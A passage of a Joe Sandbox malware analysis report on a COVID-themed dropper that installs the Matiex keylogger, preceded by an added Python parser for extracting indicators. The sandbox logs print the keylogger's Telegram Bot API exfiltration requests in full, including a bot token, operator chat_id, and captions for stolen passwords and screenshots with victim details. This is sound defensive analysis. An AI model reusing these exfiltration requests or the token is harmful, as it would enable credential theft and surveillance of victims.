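The POST requests above are the Telegram Bot API exfiltration channel used by the Matiex component: the bot token sits in the URL path, the operator's chat_id and a percent-encoded caption sit in the query string, and the stolen content (password dump, clipboard log, keystrokes, screenshot) is the multipart body. The following parser is an added example, not part of the Joe Sandbox report or of the malware: it extracts those indicators from request lines rendered the way this report renders them (headers fused onto one line) and aggregates them into a single operator profile. The sample lines are copied from the report's own entries; the assumption that a bot secret is at least 30 URL-safe characters is this example's own.

```python
"""Extract Telegram Bot API exfiltration indicators from sandbox HTTP log lines.

Added example for this report, not code from the sample or from Joe Sandbox.
"""
import re
from urllib.parse import parse_qs

# Telegram Bot API path: /bot<numeric id>:<secret>/<method>[?query].
# Assumption: the secret is >= 30 URL-safe characters (the token in this report has 35).
TOKEN_RE = re.compile(
    r"/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]{30,})/(?P<method>[A-Za-z]+)"
    r"(?:\?(?P<query>[^\s]*))?"          # query ends at the space before "HTTP/1.1"
)
# Fields Matiex writes into the caption; the report shows these exact phrasings.
CATEGORY_RE = re.compile(r"Recovered ([A-Za-z ]+?)\s*\\")
PCNAME_RE = re.compile(r"Pc Name:\s*(.+?)\s+-\s")
VICTIM_IP_RE = re.compile(r"Computer IP:\s*(\d{1,3}(?:\.\d{1,3}){3})")
CONTENT_LENGTH_RE = re.compile(r"Content-Length:\s*(\d+)")


def parse_telegram_exfil(line: str):
    """Return an IOC dict for one log line, or None if it is not a Telegram Bot API call."""
    m = TOKEN_RE.search(line)
    if not m:
        return None
    params = parse_qs(m.group("query") or "", keep_blank_values=True)
    caption = params.get("caption", [""])[0]      # parse_qs already percent-decodes
    ioc = {
        "bot_id": m.group("bot_id"),
        "secret": m.group("secret"),               # treat as a credential in the IR record
        "method": m.group("method"),
        "chat_id": params.get("chat_id", [None])[0],
        "category": None, "victim_host": None, "victim_ip": None, "content_length": None,
    }
    for key, rx, text in (("category", CATEGORY_RE, caption),
                          ("victim_host", PCNAME_RE, caption),
                          ("victim_ip", VICTIM_IP_RE, caption)):
        hit = rx.search(text)
        if hit:
            ioc[key] = hit.group(1)
    cl = CONTENT_LENGTH_RE.search(line)
    if cl:
        ioc["content_length"] = int(cl.group(1))
    return ioc


def summarize(lines):
    """Aggregate per-request IOCs into one operator profile (bot, chat, victims, volume)."""
    hits = [ioc for ioc in map(parse_telegram_exfil, lines) if ioc]
    if not hits:
        return None
    return {
        "bot_id": hits[0]["bot_id"],
        "secret": hits[0]["secret"],
        "chat_ids": sorted({h["chat_id"] for h in hits if h["chat_id"]}),
        "categories": sorted({h["category"] for h in hits if h["category"]}),
        "victim_hosts": sorted({h["victim_host"] for h in hits if h["victim_host"]}),
        "victim_ips": sorted({h["victim_ip"] for h in hits if h["victim_ip"]}),
        "bytes_exfiltrated": sum(h["content_length"] or 0 for h in hits),
        "requests": len(hits),
    }


# Sample input copied from the report's "HTTP traffic detected" entries, plus the
# checkip.dyndns.org request from the same report as a negative control.
SAMPLE_LINES = [
    "POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Passwords%20%5C HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d97680395634b8Host: api.telegram.orgContent-Length: 833",
    "POST /bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120598411&caption=%20Pc%20Name:%20user%20-%20Matiex%20Keylogger%0D%0A%0D%0A/%20Matiex%20Keylogger%20-%20Recovered%20Screenshot%20Logger%20%5C%0D%0A%20%0D%0A%0D%0A%7C%20System%20Information%20%7C%20%0D%0A%0D%0AComputer%20Name:%20562258%0D%0AMachine%20Name:%20Microsoft%20Windows%2010%20Pro%0D%0AMachine%20PlatForm:%20Win32NT%0D%0AComputer%20IP:%2084.17.52.51%0D%0A%0D%0ACountry%20Name:%20Switzerland%0D%0ACountry%20Code:%20CH%0D%0ATime%20Zone:%20Europe/Zurich%0D%0AFull%20Location:%20https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%20%20%20%206:31:48%20AM%0D%0ATotal%20Hard%20Disk%20Space:%20224%20GB%0D%0ARam%20Space:%208.00%20GB%0D%0AHardware%20ID:%205C14-3120-C5E4-7FCF-C4B6-12B5-8EC5-2C8F HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8d9768039a2802dHost: api.telegram.orgContent-Length: 828602",
    "GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org",
]

if __name__ == "__main__":
    print(summarize(SAMPLE_LINES))
```

The Content-Length is a useful secondary signal: the text logs are a few hundred bytes while the screenshot upload is roughly 800 KB, so volume alone separates the screenshot channel from the keystroke and password channels. The secret half of the bot token is the operator's credential for that bot; record it as such and do not paste it into tickets or chat that are broader than the investigation.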
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 172.67.188.154:443 -> 192.168.2.5:49783 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 158.101.44.242 158.101.44.242
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49777 -> 91.193.75.202:40401
Source: dwnl.exe, 00000021.00000002.500760473.0000000002F24000.00000004.00000001.sdmp String found in binary or memory: http://api.telegram.org
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.com
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org/
Source: dwnl.exe, 00000021.00000002.499364955.0000000002D1C000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.org/HB
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: http://checkip.dyndns.orgD8
Source: WerFault.exe, 00000022.00000003.464193186.000000000542E000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0L
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: dwnl.exe, 00000021.00000002.499649327.0000000002DA1000.00000004.00000001.sdmp String found in binary or memory: http://freegeoip.app
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: dwnl.exe, 00000021.00000003.484320135.00000000088B1000.00000004.00000001.sdmp String found in binary or memory: http://ns.adb
Source: dwnl.exe, 00000021.00000002.505061578.00000000088C0000.00000004.00000001.sdmp String found in binary or memory: http://ns.ado/1k
Source: dwnl.exe, 00000021.00000002.505061578.00000000088C0000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.c/gk
Source: dwnl.exe, 00000021.00000002.505061578.00000000088C0000.00000004.00000001.sdmp String found in binary or memory: http://ns.adobe.cobjk
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0K
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0N
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: http://ocsp.digicert.com0O
Source: dwnl.exe, 00000021.00000002.499484272.0000000002D3A000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.fonts.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.sakkal.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.tiro.com
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.typography.netD
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.420600337.0000000006F72000.00000004.00000001.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: dwnl.exe, 00000021.00000002.500760473.0000000002F24000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org
Source: dwnl.exe, 00000021.00000002.500760473.0000000002F24000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=Createutf-8Win32_ComputerSystemModelManufactu
Source: dwnl.exe, 00000021.00000002.500150887.0000000002E2A000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.500313293.0000000002E73000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.500473529.0000000002EAF000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499399021.0000000002D24000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499484272.0000000002D3A000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.org/bot1709631362:AAFYoVMQZpimi2iPHwdKoK17kT4Nb88GHhM/sendDocument?chat_id=1120
Source: dwnl.exe, 00000021.00000002.499399021.0000000002D24000.00000004.00000001.sdmp String found in binary or memory: https://api.telegram.orgD8
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app
Source: dwnl.exe, 00000021.00000002.499604994.0000000002D80000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app/xml/
Source: dwnl.exe, 00000021.00000002.500097152.0000000002E14000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499750087.0000000002DBF000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app/xml/84.17.52.51
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: https://freegeoip.app/xml/LoadTimeZoneCountryNameCountryCodehttps://www.geodatatool.com/en/?ip=/
Source: dwnl.exe, 00000021.00000002.499333644.0000000002D0B000.00000004.00000001.sdmp String found in binary or memory: https://i.imgur.com/GJD7Q5y.png195.239.51.11795.26.248.2989.208.29.13389.187.165.4792.118.13.1895.26
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: dwnl.exe, 00000021.00000002.500097152.0000000002E14000.00000004.00000001.sdmp String found in binary or memory: https://www.geodatatool.com/en/?ip=
Source: dwnl.exe, 00000021.00000002.500865912.0000000002F78000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499712859.0000000002DB7000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499993067.0000000002E05000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499842300.0000000002DED000.00000004.00000001.sdmp String found in binary or memory: https://www.geodatatool.com/en/?ip=84.17.52.51
Source: dwnl.exe, 00000021.00000002.500413972.0000000002E93000.00000004.00000001.sdmp, dwnl.exe, 00000021.00000002.499311102.0000000002D07000.00000004.00000001.sdmp String found in binary or memory: https://www.geodatatool.com/en/?ip=84.17.52.51%0D%0A%0D%0ADate%20and%20Time:%209/13/2021%20%20%20/%2
Source: UK COVID UPDATES AND ENTITLEMENT.exe String found in binary or memory: https://www.gnu.org/licenses/gpl-3.0.html
Source: UK COVID UPDATES AND ENTITLEMENT.exe String found in binary or memory: https://www.gnu.org/licenses/gpl-3.0.htmlF
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.newtonsoft.com/json
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.newtonsoft.com/jsonschema
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421126177.0000000007930000.00000004.00020000.sdmp String found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
Source: unknown DNS traffic detected: queries for: www.google.com
Source: C:\Users\user\AppData\Local\Temp\UK COVID UPDATES AND ENTITLEMENT.exe Code function: 28_2_0040221C ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,malloc,recv,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,free,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ, 28_2_0040221C
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.appConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: GET /xml/84.17.52.51 HTTP/1.1Host: freegeoip.app
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49790 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49830
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49810 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49814
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49812
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49810
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49794 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown Network traffic detected: HTTP traffic on port 49830 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49800
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49792 -> 443
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.421347506.0000000007D20000.00000004.00000001.sdmp String found in binary or memory: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comN equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416917589.0000000001256000.00000004.00000020.sdmp String found in binary or memory: -Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
Source: UK COVID UPDATES AND ENTITLEMENT.exe, 00000000.00000002.416957325.00000000012AE000.00000004.00000001.sdmp String found in binary or memory: -Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.comO equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: DESKTOP-71... www.youtube.com 172.217.20.14 32 27 equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: DESKTOP-71... www.youtube.com 172.217.20.14 32 28 equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: DESKTOP-71... www.youtube.com 172.217.20.14 32 30 equals www.youtube.com (Youtube)
Source: PowerShell_transcript.562258.s+AUuVS9.20210913063011.txt.4.dr String found in binary or memory: Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Test-Connection www.google.com , www.youtube.com , www.google.com , www.youtube.com ,www.google.com , www.youtube.com equals www.youtube.com (Youtube)
